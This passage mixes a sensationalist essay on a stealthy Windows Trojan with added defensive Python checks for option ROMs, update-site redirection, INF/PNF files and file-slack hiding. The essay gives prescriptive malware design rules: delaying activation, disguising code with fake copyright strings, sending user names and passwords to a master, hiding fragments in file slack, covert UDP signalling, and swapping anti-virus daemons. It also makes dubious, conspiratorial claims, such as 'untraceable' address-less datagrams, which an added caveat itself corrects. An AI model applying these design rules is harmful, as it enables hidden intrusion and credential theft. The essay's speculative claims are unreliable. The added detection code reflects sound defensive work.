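    if len(image) < 3 or image[0] != 0x55 or image[1] != 0xAA:
        raise ValueError("missing 0x55AA option ROM signature")
    return image[2] * ROM_BLOCK


def checksum_ok(image: bytes) -> bool:
    """The BIOS accepts an option ROM only if the 8-bit sum of all bytes in
    the declared length is zero. This catches corruption, not tampering."""
    n = rom_length(image)
    return len(image) >= n and sum(image[:n]) % 256 == 0


def digest(image: bytes) -> str:
    """SHA-256 over the declared ROM length. Record this from a known-good
    card (or the vendor's published image) as the baseline."""
    return hashlib.sha256(image[: rom_length(image)]).hexdigest()


def verify(image: bytes, baseline_sha256: str) -> dict:
    """Run all three checks; only the hash match against a trusted baseline
    actually shows that the image has not been altered."""
    try:
        sig = rom_length(image) > 0
    except ValueError:
        return {"signature_ok": False, "checksum_ok": False,
                "hash_ok": False, "trusted": False}
    csum = checksum_ok(image)
    hash_ok = digest(image) == baseline_sha256
    return {"signature_ok": sig, "checksum_ok": csum,
            "hash_ok": hash_ok, "trusted": sig and csum and hash_ok}


def build_demo_rom(blocks: int = 2) -> bytes:
    """Construct a minimal, non-functional ROM image: header, a placeholder
    init entry, zero padding, and a final byte that zeroes the 8-bit sum."""
    img = bytearray(blocks * ROM_BLOCK)
    img[0], img[1], img[2] = 0x55, 0xAA, blocks
    img[3:7] = b"\xE9\x10\x00\x90"           # placeholder: jump to init code
    img[-1] = (-sum(img[:-1])) % 256
    return bytes(img)


def patch_and_rebalance(image: bytes, offset: int, patch: bytes) -> bytes:
    """Test vector: apply a small patch and fix the checksum byte, so the
    result still passes checksum_ok and only the hash comparison notices."""
    img = bytearray(image)
    img[offset:offset + len(patch)] = patch
    img[-1] = 0
    img[-1] = (-sum(img[:-1])) % 256
    return bytes(img)


if __name__ == "__main__":
    good = build_demo_rom()
    baseline = digest(good)                   # recorded from the clean card
    print("clean image:  ", verify(good, baseline))
    tweaked = patch_and_rebalance(good, 3, b"\xEB\x20")   # a two-byte change
    print("tweaked image:", verify(tweaked, baseline))
```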
The Trojan core program then accessed the hidden disk partition and began executing a pre-scripted defense
protocol which involved, among other things, custom tweaks to the installer program’s INF or PIF files to
ensure that there was continued control and mitigation of possible risks to the Trojan. The Trojan then
updated its master as to what happened and what it did in response. The Trojan master thought it best to
get an updated copy of the files on the computer just in case the IT guy persisted, and so instructed the
Trojan BOT to implement a network-synchronized web share which automatically copied various directories to
a machine controlled by the Trojan Masters. The re-install was automatically altered while “on the way in”
while the IT guy was present, though there would be no way of him guessing what was happening. The
Trojan intercepts all installs via a custom “pinch point” MSI program that is designed to examine the
proposed install and then categorize the proposed install according to various rules.
These rules serve to describe some of the Trojan’s more interesting behaviors in response to changes in the
installation environment or active threats to its secrecy.
Defining Terms
The following terms are used by the Trojan to categorize various user activities.
Dangerous
The incoming application is perhaps a discovery tool, capable, in the right hands, of piercing a hole in the
Trojan’s armor, leading to a possibility of some explicit exposure.
Or:
The application, if allowed to run normally, crashes when it encounters either a circumstance created by the
Trojan or a component of the Trojan itself. This creates a repeatable failure-mode, which may lead to
forensic investigation, and, in turn, lead to an explicit exposure.
Or:
The application in its normal operation innocently interferes with an aspect of the Trojan’s operations causing
the Trojan to crash with unpredictable consequences possibly leading to exposure of the Trojan’s crashed
programs, code or files.
Harmful
The incoming application in its normal operation innocently interferes with an aspect of the Trojan’s
operations, causing the Trojan to lose a function or service; neither program crashes and there is no possibility
of exposure.
Nullable
The dangerous or harmful aspects of the incoming application may be mitigated if the application is installed
with various features and options turned on or off, or modified, during the install process. This may include
making changes to the security context of the application or perhaps changes to the security permissions of
the user(s). Many techniques are used to ‘null’, or eliminate, harmful applications, including but by no means
limited to:
Skinning: The application obscures harmful selection buttons or tabs with GIF images.
Pre- or post-install modifications of default configuration files: The application makes defaults safe.
Radio button function reversal: YES=NO ENABLE=DISABLE
(Note above only used in combination with other techniques)
Full skinning user interface emulation of the application: The application’s visible controls are effectively
completely replaced by presenting the user only with a concurrently running compiled XML version of the
application user interface. This visible “shell” then accepts user input and applies filtering rules to the
commands before passing them on to the real program which is running unmodified in a different and
invisible memory arena. Visible feedback if any, from the real program, is captured by the XML simulator and
displayed / emulated back to the user.
AUTHOR’S NOTE: THE HACK TOOL THAT AUTOMATES THE SKINNING AND EMULATION OF AN
APPLICATION IS THE COOLEST SOFTWARE I HAVE EVER SEEN BAR NONE! WITH A LITTLE TWEAKING IT
COULD BECOME AN APPLICATION OPTIMIZER! AS A TROJAN TOOL IT IS A LITTLE TOO BLATANT.
After-the-fact changes to control options: Allows normal installation with defaults then either edits
configuration files, or establishes an OLE or ActiveX control to the offending setting. Thus, the Trojan may
dynamically disable and enable features as needed. This is a subset of the Trojan’s normal application
control suite.
Useful
A large category. Many applications will have multiple areas of usefulness; examples are, as usual, not
limited to:
Auto-update feature, especially if it is of the type “Check for updates at startup” (as opposed to a
reasonable schedule of some number of days). This automatic and implicitly trusted Internet access will be
subject to a tricky redirect to a faked version of its update site where the application could receive a little more
of an update than it asked for, or the Trojan will treat this as an opportunity for some high-speed downloads
and produce fake errors to buy extra time on the high-speed line. Any benign app that has auto-update is
well liked by the Trojan Masters.
Any web-enabled application: these are golden! Examples are the various media players that have been
given trusted access to go onto the Internet whenever they run and perform some trivial task, like
downloading the song’s artist data or looking for related web sites after a browser search. The usefulness is
similar to the previous case, but more often in the background, giving tell-tale URLs and freedom for the
Trojan to surf the web, albeit briefly.
Note: It is not just applications that are given these rights by the user and are used by the Trojan. Windows
XP has its own auto-update feature and can be set to fully automatic, spelling out heaven for our Trojan.
Trusted in background with unlimited time on line, the user has no knowledge of the task name, duration or
update site and best of all, its explicit permission to install any program with elevated privileges. Privileges
higher, in fact, than those of the user, which in turn give the Trojan implicit authority to add functions or
patches to the installed program with similar elevated privileges. (See privilege use and certificates)
PCHEALTH, discussed elsewhere, has these rights by default and you cannot turn them off!
Microsoft's error reporting system is another operating-system "talker". At least it asks first, but once given permission the Trojan can send its report anywhere it likes. Our sneaky Trojan can even generate the error that causes the need for the transmission in the first place. Thankfully, unlike PCHEALTH, this service can be disabled and turned off.
Let us not forget the pre-emptive permission granted during the Windows XP installation itself: Windows invisibly goes onto the Internet and updates its own installer, giving our Trojan an early start with unlimited initial-install bandwidth. Truly a fast track to a fully mature take-over.
And what about all those security patches Microsoft constantly admonishes us to download and check on regularly? Do we hesitate to patch right after an install? Not usually. Do we carefully check the URL when we go to Microsoft Update? No. We do know that we are vulnerable to some 1,800 known security flaws, since the disc we just installed is the release version and the download is Service Pack 3 including several security rollups (Windows 2000), or perhaps XP Service Pack 1 plus the cumulative security rollup. Of course we need them, but if we are already seeded we may be sealing our fate, since the URL attached to the top icon on the Start menu is certainly a "pinch point" to tweak, and we, the user, would not dream of checking it before clicking. It is part of our operating system, right? Wrong.
The Trojan can, and routinely does, tweak it, sending us off to an Alice-in-Wonderland version of Microsoft's familiar website: thousands of cloned copies of the real pages, copied fresh each hour by a Trojan bot and checked by a real corporate-hacker employee on "Micro-softie" duty that day. There you can get real patches, or sometimes (if benign) partial patches with reserved back doors, and while you are there, deposit scads of your personal data for perusal by another corporate hacker on duty looking for valued IP.
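Two checks a practitioner can run against the update-site redirect described above, as an added example (this is not code from the original document, nor part of any product it describes). It assumes the redirect is made either by altering the URL that an update client or Start-menu shortcut points at, or by overriding the update host's name resolution; a hosts-file entry is the simplest way to do the latter, so that is what the second check looks for. The allow-list of expected update hosts and the sample hosts file are constructed for the example.

```python
"""Checks against update-site redirection: URL host validation and hosts-file overrides.

Added example, not code from the original document. The expected-host
allow-list and the sample hosts file below are constructed.
"""
from urllib.parse import urlsplit

# Update hosts the machine is expected to talk to (assumed allow-list).
EXPECTED_UPDATE_HOSTS = {
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
    "download.windowsupdate.com",
}


def host_is_expected(host: str, allowed=EXPECTED_UPDATE_HOSTS) -> bool:
    """True only if host is an allowed name or a proper subdomain of one.

    The suffix match is on whole labels, so a look-alike such as
    "windowsupdate.microsoft.com.example.de" is rejected.
    """
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in allowed)


def check_update_url(url: str) -> str:
    """Classify an update URL as 'ok', 'wrong-host', 'no-tls' or 'malformed'."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "malformed"
    if not host_is_expected(parts.hostname):
        return "wrong-host"
    if parts.scheme != "https":
        return "no-tls"          # a plain-http update URL can be redirected in transit
    return "ok"


def hosts_overrides(hosts_text: str, allowed=EXPECTED_UPDATE_HOSTS) -> list:
    """Return (hostname, ip) pairs in a hosts file that pin an expected update
    host to a fixed address, which silently redirects every client on the box."""
    found = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        ip, names = fields[0], fields[1:]
        for name in names:
            if host_is_expected(name, allowed):
                found.append((name.lower(), ip))
    return found


# Constructed sample hosts file: two benign entries and one redirect.
SAMPLE_HOSTS = """\
# constructed sample, not a real hosts file
127.0.0.1       localhost
10.0.0.7        intranet.example.local
192.0.2.44      windowsupdate.microsoft.com   # pins the update site to a test address
"""


def demo() -> dict:
    """Run both checks over constructed input."""
    urls = (
        "https://windowsupdate.microsoft.com/",
        "http://www.windowsupdate.microsoft.com.example.de/",
        "https://windowsupdate.microsoft.com.attacker.example/",
        "https://v4.windowsupdate.microsoft.com/en/default.asp",
    )
    return {"urls": {u: check_update_url(u) for u in urls},
            "hosts": hosts_overrides(SAMPLE_HOSTS)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a live machine, feed check_update_url the target of the Windows Update shortcut and hosts_overrides the contents of %SystemRoot%\system32\drivers\etc\hosts; the whole-label suffix match is what defeats a legitimate name with an extra domain hung on the end.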
Unknown
An unknown application may be handled in one of three ways, depending on the Trojan Master's settings. A cautious controller treats an unknown as harmful and delays the install until a mitigating Trojan module or patch can be obtained. A daring controller may take a chance and allow the install, patching on the fly, spotting and tweaking helpful auto-updates and the like as they are installed, and thereby mitigating various harmful traits. The third possibility is a little smarter: the Trojan allows the application to install into a controlled install environment hosted by the Trojan itself, records the install sequence in detail, then, based on analysis of the resulting code, allows, fails, or mitigates the application. If allowed or mitigated, it passes the application on for a legitimate install into the real operating system.
Unknowns are also candidates for transmission in their entirety to Trojan Central, which is always on the lookout for new intellectual property.
Benign
Upon recognizing the proposed install as benign (neither useful nor harmful), the Trojan allows the install to proceed according to the unmodified PNF file (see below) or the INF file that accompanies the package. When a useful feature of the application is recognized and the change files or patches are on hand, the Trojan allows the install but substitutes its own pre-compiled change file, which installs a modified version of the application for use by the Trojan (e.g. changing www.automatic-update.com to www.automatic-update.com/redir-ImakesureIownyoursystem.de).
When a Trojan finds an application it deems harmful yet "nullable" (made harmless, in Trojan Master parlance) with a change file on hand, the Trojan, by means of the installer program, installs, deletes and/or modifies installed files as per the instructions in the change file: a precompiled INF created by combining the original INF shipped with the application with a "change list" downloaded from the Trojan Master archives.
Applications recognized as harmful yet "nullable" WITHOUT a PNF on hand catch the Trojan unprepared. This can only happen in the very early stages of a take-over, before the full complement of PNFs has been generated. There are over 300 native INFs to process; the work is very disk-intensive and is therefore allocated to quiet time, and full processing can take several days. If challenged with a harmful application during this vulnerable stage, the Trojan resorts to "fall-back" procedures, created without the PNF, to effect a temporary "null" outcome. It immediately requests the specific PNF or change file it needs by broadcasting a FILE NEEDED request on all available channels and protocols, and continues to cycle through its fallback responses until the needed file arrives or the user tires of dumb error messages and gives up trying to install the harmful application.
Fallback procedures
Fallback procedures vary all over the map. Examples include:
Allow the install, but cripple the incoming application by scrambling portions of the executable during or after install, causing the application to crash upon execution, with the cause explainable as random data corruption.
Implicitly disallow the install by crashing the installer, or even by faulting a critical kernel service, i.e. the whole system (the "blue screen of death" page-fault error, or an in-page I/O error).
Explicitly disallow the install by means of Trojan-generated installation errors (real errors, set up or triggered by Trojan intervention).
Explicitly disallow the install by preventing the installer from running and simulating a partial install attempt followed by bogus error messages such as:
"Your operating system configuration is incompatible with the application"
"This application is incompatible with your operating system"
(See bogus and dumb error messages for more of these gems)
"Disk error reading drive C: [Retry] [Quit]"
(The Retry is just for authenticity; go ahead and quit)
"CRC error reading file <name of perfectly readable file>"
"BAD DISK"
(See Even Dumber Error Messages for more of these classics)
Note Regarding PNF Files
Applications, drivers and other software are introduced to the system through a common mechanism, referred to in this document as the MSI installer. (Strictly, the plain-text INF script described here is processed by the Windows Setup API, setupapi.dll, which is also what writes the precompiled PNF; Windows Installer, MSI, consumes .msi package databases instead. The pinch-point argument applies to either.) The installer places the combination of files, data, programs, images, icons and so on that form the components of a piece of software according to a list of instructions written in plain text in a specialized scripting file named <name of program>.INF.
From Microsoft's point of view, this ensures consistent and correct registration, signature checking, decryption and version-number checking of the incoming files. From the Trojan Master's point of view, it is a "pinch point" of power, a must-have high ground in the battle for control.
Rules regarding PNF files
The reason for the PNF file rather than the customary plain INF file format is best explained by more rules:
RULE: If an application is harmful, create an INF that "nulls" it. However, change only what is essential, and test, test, test the INF and the change file: they must never crash, since that might lead to an exposure. IMPORTANT!
RULE: If you customize an INF file, never leave it in the INF folder. It is too easily read with a simple text editor and could lead to an exposure. Keep incriminating INFs in the secret archive. IMPORTANT!
RULE: As soon as the installer modification is installed, use the PNF factory tool to create custom PNFs not only for the INFs native to the system INF folder but also for the INFs in the secret archive. This lets you free up archive space.
RULE: Always leave the normal, non-customized INF file in the INF folder alongside the custom PNF file. Investigators take the easy path first, which will appear normal, and INF access can be rigged to trigger self-protection procedures.
RULE: Always process all INF files to PNF files, even where no customization is required. This avoids tell-tale processing inconsistencies and acts as obscuring "chaff" for the "guilty" PNFs.
RULE: Even if you totally own the system, continue to patch all "helpful" installs. They form layers of backup, essential should you lose a primary control point or an update-opportunity access control.
RULE: Protect your change-list database files at all costs. They are one of the keys to power and the result of thousands of hours of effort. IMPORTANT!
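A folder-inventory check against the INF/PNF layout these rules describe, as an added example (not code from the original document). It works from a listing of the INF folder (name, size, modification time) rather than from the undocumented PNF format, so it can spot layout and timing inconsistencies but not a PNF whose contents disagree with its INF; the sample listing is constructed, and the folder path is an assumption.

```python
"""Inventory check for the INF/PNF folder: orphan, stale and missing PNFs.

Added example, not code from the original document. SAMPLE is a
constructed listing; INF_DIR is an assumed path.
"""
import os
from typing import Dict, List, Tuple

INF_DIR = r"C:\WINDOWS\inf"     # assumed; %SystemRoot%\inf on NT-family systems

Listing = Dict[str, Tuple[int, float]]   # file name -> (size, mtime)


def scan_dir(path: str) -> Listing:
    """Build a listing from a real folder (the offline demo below does not call this)."""
    out: Listing = {}
    for name in os.listdir(path):
        st = os.stat(os.path.join(path, name))
        out[name.lower()] = (st.st_size, st.st_mtime)
    return out


def find_anomalies(listing: Listing) -> List[Tuple[str, str]]:
    """Return (kind, stem) pairs worth a second look.

    orphan-pnf : a .pnf with no .inf beside it; the rules say to always leave
                 the normal INF next to the custom PNF, so an orphan is either
                 a slip-up or an unrelated leftover
    stale-pnf  : the .inf is newer than its .pnf; Setup regenerates the PNF
                 when the INF changes, so a stale one means the INF was
                 touched after precompilation
    no-pnf     : an .inf that was never precompiled; normal on a fresh
                 system, and since the rules want every INF processed, a
                 folder with none of these is itself a data point
    """
    infs = {n[:-4]: v for n, v in listing.items() if n.endswith(".inf")}
    pnfs = {n[:-4]: v for n, v in listing.items() if n.endswith(".pnf")}
    out: List[Tuple[str, str]] = []
    for stem, (_, pnf_mtime) in sorted(pnfs.items()):
        if stem not in infs:
            out.append(("orphan-pnf", stem))
        elif infs[stem][1] > pnf_mtime:
            out.append(("stale-pnf", stem))
    for stem in sorted(set(infs) - set(pnfs)):
        out.append(("no-pnf", stem))
    return out


# Constructed listing; times are seconds since the epoch.
SAMPLE: Listing = {
    "layout.inf": (4096, 1000.0), "layout.pnf": (9000, 1010.0),   # normal pair
    "usb.inf":    (2048, 1500.0), "usb.pnf":    (5000, 1100.0),   # INF edited after PNF
    "netmsi.inf": (700,  1000.0),                                  # never precompiled
    "helper.pnf": (3000, 1200.0),                                  # PNF with no INF
    "readme.txt": (100,  900.0),                                   # ignored
}


def demo() -> List[Tuple[str, str]]:
    return find_anomalies(SAMPLE)


if __name__ == "__main__":
    for kind, stem in demo():
        print(f"{kind:11s} {stem}")
```

Run it against scan_dir(INF_DIR) on a suspect machine and against the same call on a known-good build of the same Windows version; the two lists, not either one alone, are what tell the investigator which PNFs deserve a byte-level look.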
Dealing with Threats
The change list is, of course, extremely variable, but by way of example it may contain any combination or derivation of, though is not limited to, the following possibilities.
If presented with any of the standard (or deluxe, for that matter) anti-virus or anti-Trojan utility suites, our smart Trojan calmly watches the install to determine the type and version number of the utility. It identifies the kernel daemon(s): the programs that run constantly and are the eyes and ears of a virus or Trojan checker. The Trojan then waits for the installer to call for a reboot of the system, a required step to install a kernel daemon. All programs begin to peel off, self-terminating as they reach safe points in their execution cycles: a tidy close-down for all, including the anti-virus installer, which has prepared and placed its daemon in its launch position to commence duty on the next start-up. The Trojan closes most of its programs too. However, its last act is to launch a small and very fast kernel thread that is not looking for a close-down point. Instead, the Trojan kernel thread hangs on grimly as the last of the other programs bail out prior to power-down. Here our Trojan makes the first of several very clever and exquisitely timed moves. It calls up from its private store of "software for all occasions" the precise variety of evil daemon twin required to patch, replace or simulate the threatening utility daemon, then does nothing but monitor the count of running threads reported by the processor, paying very close attention until the precise moment when it detects one and only one kernel thread left running.
Clearly, if there is only one kernel thread running and our Trojan uses a kernel thread, then that remaining kernel thread IS our Trojan. For the briefest of moments, between the time the very last straggler application self-terminates and the operating system itself closes, the Trojan is alone with a completely unprotected processor, registry, hard disk, everything. There is only that singular moment to act, and act it does, in a remarkable feat of precision timing. The Trojan erases the anti-virus daemon, yes, the one that was just created and left expecting to begin duty on power-up, substitutes the evil-twin impostor or patch, and terminates itself. With no other programs running, it is certain that the impostor will launch successfully on reboot, looking for all the world like a good and honest virus checker.
The Trojan Masters – History and Splinter Groups
We have investigated the history of this class of software and tried also to trace its roots to more primitive versions of key elements. There are key elements of note, but it would not do this integration tour-de-force justice to link it (with however many caveats) to any group of primitives. The truth is that the typical Trojan, if there is such a thing, draws from everything that is worthwhile, and where there are a lot of good sources, goes ahead and overkills the functionality to the point of absurdity. More recent historical data indicates that these programs were first introduced by certain foreign quasi-governmental groups, in a complete but immature and not very robust form, in late 2001, September through December being the most active period. This weak progenitor software was quickly taken over by, as far as we can tell, at least three non-originator groups, two apparently in the US and one in Europe. By March 2002, a third US-based group had modified the software and added much of its unique and important survivability traits. Many aspects of the described software are not yet known to the security community, or have been previously noted, misunderstood outside the context of an integrated suite of programs, and dismissed or forgotten. We must also acknowledge that there are crossover elements within the established security community which may have played a part in intentionally obscuring the importance of these developments.
Certain operational aspects of the powerful software suites in use today leak out occasionally, eliciting patchy responses from the security community and guarded research by computer and software manufacturers.
Despite a healthy respect for the software, as evidenced by my attempt at emotive writing on the subject, it is by far more important to understand the significance of the existence of several effective, large-scale, anonymous hacker collaborations, each with an established departmental protocol, mediated by robust data objects with defined functions and effectively administered security zones: a structure which seems to have gained the general acceptance and agreement of all (well, we have seen no dissenters with working computers, anyway). Its very existence, and the fact that it can produce superior software products, effectively maintain a large and profitable money flow, and administer a power, management and discipline structure, albeit with a few breakaway groups, is truly revolutionary.
We have data on how the management structure, permissions allocation, recruiting and departmental-structure enforcement software works. However, an adequate description might tip the balance of this document back into the Chinese-phone-book category from whence it came. Suffice it to say that it is a tightly reined cooperative motivator par excellence, with rewards (cash) and punishments (no cash) and, oh yes, the "nuke on sight" list. It clearly works and it is not really very "stoppable" at this point, so welcome to the world scene, several new and permanent forces. It is a pity they are of the evil kind. I guess there is no way to persuade you guys to stop all that bad stuff and use your powers for good to help the world?
Cyber Crooks
Along with this new software there has emerged a new hacker, one who is no longer a "lone wolf" writing his own software. The new hacker works on a team. He may have assigned duties and, in what must be an especially welcome change, he is paid a living wage. Previously we described our hacker adversaries, "the WolfPak," from the point of view of the "wolf cub" or "script kiddie" recruit. Now let us consider the role of the highly qualified programmer.
Tech Officers
He operates within the same structure, but at a much higher level: he participates in a percentage of the take and is paid a hefty retainer. One portion of his task is tech-officer duty, responding to the cries of Wolf Cub teams who have run into errors they do not know how to recover from, or perhaps directing a team of Cubs to perform an IP-address sweep of an automotive design center in the hope of chancing upon a particularly high-value design file (a special request from a regular, wealthy client). A daily chore is two hours as the on-duty install security manager, as each new zombie machine calls in to report its newfound zombie-hood.
Zombies:
Compromised systems are programmed to call in and report their software and connectivity lists. These are logged and scanned for anything that may be of interest or value, and a "score" is recorded for the "wolf cub" that brought home the bacon. The zombies are then given a security "once over." Then, depending on what is needed or on the specifications of a particular zombie, it is assigned a role in life: the tech officer may direct it to become a web server, part of the voice-over-IP network, or part of an untraceable peer-to-peer music-swapping network. The zombies then request the required software modules and slowly, so as not to arouse suspicion, take on their new place in life, in addition to performing their duties for the folks who still think they are the zombie's owners.
Extending the NameSpace
The Trojan software can essentially steal computers without their ever leaving home, integrating their usurped resources into an ever-growing sub-network, or "NameSpace", whose extent is known only to the chiefs of a new and amazingly complex type of organization: the structured hacking corporation. This new software, and the new type of clandestine organization that wields this awesome power, will inexorably and inevitably be molded by the forces of cyber-evolution into something that will change the world.
Hackers United
The Trojan software and the mature hacking-corporation structure form an incredible feat of software and human integration. The word "integration" is key to understanding the dramatic shift in the balance of power that has occurred over the past two years in the field of computer security. With over two years of intense research focused on the discovery and documentation of these integrated software suites, we have managed to map the full extent of the various relationships and dependencies. The result is an astonishing insight into what is about to become the next technological revolution.
Integration refers not only to the combination of the various software elements into a software suite but also to the integration of individual hackers into a global, coordinated team. Therein lies their true power. The reader should note that it is this marshalling of human cooperation, rather than any revolutionary technological innovation, that has created an overwhelming new power and capability which, when unleashed, will literally change our world. This power is already in action and fully operational, deployed on a limited basis. I fear its potential for global damage, and I fear also that the attached documentation, if mishandled, has the potential to trigger various events and escalations which we know are pending release. Please be responsible with this document and place it in machine-readable form only if you really know what you are doing. Please take to heart the following somewhat tongue-in-cheek but nonetheless accurate paragraph.
While at the Microsoft security site, it is interesting to note that many security-related bug reports conclude with a severity rating ("medium risk" etc.) and an innocuous-sounding note to the effect that misuse of the vulnerability could lead to "execution of code of their choice", "arbitrary code execution", "unauthorized read-write access", "execution of code with system-level privileges", "elevation of privileges" and so on. These relatively mild-sounding consequences could, depending on who it is that is doing the executing, be better interpreted by the following more accurate, and much less innocuous, consequence description:
YOU ARE TOTALLY WITHOUT HOPE. YOUR PRIVACY IS GONE. EVERY SCRAP OF DATA ON YOUR COMPUTER IS NOW IN THE HANDS OF AN UNSCRUPULOUS CRIMINAL ORGANIZATION. NO MATTER WHAT YOU DO, YOU CAN NEVER EVER ERASE THIS COMPROMISE; YOU HAVE NO CHOICE BUT TO THROW OUT NOT ONLY YOUR COMPUTER BUT ALL THE COMPUTERS ON THE NETWORK, ALONG WITH A LARGE PORTION OF THE NETWORK ITSELF. IN ADDITION, SINCE YOU DID NOT SPOT THIS PROBLEM IN LESS THAN A SECOND, THE SAME APPLIES TO EVERYONE YOU HAVE EVER SENT AN EMAIL TO.
Design Rules
RULE: The initial starter executable should be extremely small and initially focus on remaining hidden until automatically executed at a time sufficiently far from the original breach that the following goals are achieved:
A: The target user feels that the breach has been dealt with and the system is secure.
B: Responses to the breach, such as additional firewall programs, anti-virus checkers, changes in settings etc., are complete and the system is stable.
C: Sufficient "normal" computer usage indicates that the system is trusted by the target user.
Target user's confidence = High
Therefore:
Target user's vigilance = Low
RULE: The starter executable should be designed so that its function is as difficult as possible to discern through direct examination of the code.
RULE: The starter should never include code that would attract in-depth analysis. Specifically, it should not reproduce itself, attach itself to any other file, modify high-vigilance areas (such as the boot sector), access areas commonly used as virus vectors, or modify or delete any other files.
RULE: The starter code should be written so that, if discovered upon activation, it would most likely be considered an innocuous curiosity. Additional "distracter" code may be added to support the notion that the code is a benign piece of flotsam; a string such as "© MicroSoft Inc. All Rights Reserved" serves well as a distracter.
RULE: Limit starter functionality to its core function, namely broadcasting the "come and get me" message on any and all available ports using any and all available protocols, without regard to "standard" conventions.
RULE: Using the best crypto available, while sending "the message", encode the following data only: IP address, MAC address, user name, password, processor type, operating system major version number, operating system minor version number, version number of starter kit, open port number (if any), Telnet version number, fax number (if any), quiet-time start hour, hacked-by ID #.
RULE: Sufficient time must have passed between the initial security breach and the activation that the appearance of the curious executable and the penetration event would be considered unconnected events, alleviating suspicion that the starter code may be "mal-ware".
The clandestine executable remains completely hidden, encrypted and compressed, separated into a number of file fragments on the target hard disk and buried in the so-called "cavities" (file slack): the unused bytes always left between the non-sector-aligned, "ragged" end of a legitimate file and the beginning of the next file, which by convention always starts on the next sector (cluster) boundary. A perfect hiding place, and there are many others just as secure. (One caveat a forensic examiner would add: slack belongs to the file that owns the cluster and is overwritten whenever that file grows, and a slack-space scan of the volume shows it as non-zero data where a freshly written file would leave zeros.)
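An audit of the cavities (file slack) described above, which also covers the re-assembly from cavities described under First Infection, as an added example that is not code from the original document. It models a volume as a byte image plus a directory of (start offset, logical size) entries with a fixed allocation unit; the image is constructed, and the 512-byte unit is an assumption (NTFS defaults to 4096). On a real system the same scan runs over a raw image with entries taken from the file system's allocation records, which is what forensic toolkits such as The Sleuth Kit do (its blkls -s extracts exactly this slack space).

```python
"""Slack-space ("cavity") audit over a constructed volume image.

Added example, not code from the original document. CLUSTER is an
assumed allocation unit; build_sample() constructs the image.
"""
from typing import List, NamedTuple, Tuple

CLUSTER = 512          # assumed allocation unit; NTFS defaults to 4096


class Entry(NamedTuple):
    name: str
    start: int         # byte offset of the file's first cluster in the image
    size: int          # logical length (EOF) in bytes


def slack_range(e: Entry, cluster: int = CLUSTER) -> Tuple[int, int]:
    """[begin, end) of the bytes between EOF and the end of the file's last cluster."""
    allocated = -(-e.size // cluster) * cluster     # round size up to a whole cluster
    return e.start + e.size, e.start + allocated


def scan_slack(image: bytes, entries: List[Entry], cluster: int = CLUSTER):
    """Report every file whose slack is not all zero as (name, begin, end, payload).

    A freshly written file on a zero-filled volume has zero slack, so any
    non-zero byte there is either a leftover of an earlier, larger file or
    something placed deliberately; both deserve a look."""
    hits = []
    for e in entries:
        begin, end = slack_range(e, cluster)
        if begin == end:            # size is an exact cluster multiple: no cavity
            continue
        chunk = image[begin:end]
        if any(chunk):
            hits.append((e.name, begin, end, chunk.rstrip(b"\x00")))
    return hits


def reassemble(hits) -> bytes:
    """Join cavity payloads in directory order, as the text says the starter
    code is re-assembled; a real reassembler would need sequence numbers,
    a detector does not."""
    return b"".join(payload for _, _, _, payload in hits)


def build_sample() -> Tuple[bytes, List[Entry]]:
    """Six-cluster constructed image: three files, two cavities carrying fragments."""
    img = bytearray(6 * CLUSTER)
    entries = [
        Entry("a.txt", 0 * CLUSTER, 700),    # 324 bytes of slack
        Entry("b.dll", 2 * CLUSTER, 1536),   # exact cluster multiple: no slack
        Entry("c.log", 5 * CLUSTER, 300),    # 212 bytes of slack
    ]
    for e in entries:                        # legitimate file contents
        img[e.start:e.start + e.size] = b"A" * e.size
    a_begin, _ = slack_range(entries[0])
    img[a_begin:a_begin + 9] = b"FRAG1-abc"  # fragment hidden behind a.txt
    c_begin, _ = slack_range(entries[2])
    img[c_begin:c_begin + 5] = b"FRAG2"      # fragment hidden behind c.log
    return bytes(img), entries


def demo():
    img, entries = build_sample()
    hits = scan_slack(img, entries)
    return hits, reassemble(hits)


if __name__ == "__main__":
    hits, joined = demo()
    for name, begin, end, payload in hits:
        print(f"{name}: slack [{begin}, {end}) carries {payload!r}")
    print("reassembled:", joined)
```

The edge case worth noting is b.dll: a file whose size is an exact multiple of the allocation unit has no cavity at all, so a hider that assumes every file offers one will corrupt the next file's first cluster instead.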
First Infection
When the timer set up on initial penetration indicates the coast is clear, it launches a tiny code fragment tasked with two missions: decrypt and execute the first fragment of the broadcaster code, then destroy all traces of the timer, the decryption set-up code and itself.
Each segment of the broadcaster is extracted from its cavity, decrypted and re-assembled into an executable by the previous segment. In the case of the sector-boundary cavities each hiding place is small, perhaps 512 bytes, yet since there are thousands of cavities, code of any desired length can be assembled. Once the broadcaster is complete the decryption code is destroyed, and the broadcaster begins a sequence of calls to its master. The broadcast is by means of signals commonly used to coordinate network component timings. This can take many forms, but they all share the following characteristics:
"Untraceable" UDP communications.
All signals use low-level IP formats and protocols that are common infrastructure "noise" everywhere.
These signals are not addressed to or from any particular system or individual; they have no IP address or MAC address of their own and are, on this reasoning, untraceable. Being in the format of low-level Internet infrastructure signals, they are routinely forwarded on their way, without examination or comment, by any computer receiving them, for these signals are what hold the Internet together. Internet-connected computers, web servers, switching routers and firewalls are the hardware of the Internet, and their activity is connected and coordinated by signals such as these. Such datagrams are generally considered "safe data", since their normal function is to coordinate infrastructure-related, low-level machine communications; consequently they are common and everywhere, and switches are designed to pass hundreds of kilobytes of this data without so much as the flash of an LED. The use of these protocols is what is relied on to ensure complete anonymity and to counter traceability both forwards and backwards.
Practitioner's caveat: every IP datagram, broadcast or not, carries a source address; limited-broadcast (255.255.255.255) and subnet-broadcast datagrams are not forwarded by routers beyond the local segment; and any host on that segment can capture and log them. The "untraceable" property therefore rests on nobody looking, not on the protocol.
Rules Regarding Communications
RULE: All communications to and from the Master are one-way broadcast signals. Even if the protocol allows for acknowledgment, it must not be used. There can only be one broadcaster and one passive listener at a time.
RULE: Transmissions should be long in each direction. A rapid "ping-pong" of short exchanges exposes the transmission as communications, allowing detection with a possibility of following the signal back to its source during its transmission phases.
RULE: Similarly, the transmissions must never be allowed to appear "related" by similarity or be a complement of one another. Nothing that might tie broadcast and listen sessions together, revealing them to be part of the same conversation, should be allowed.
RULE: Where possible, use datagram sizes and patterns of use formulated to simulate as closely as possible the normal low-level protocol being emulated.
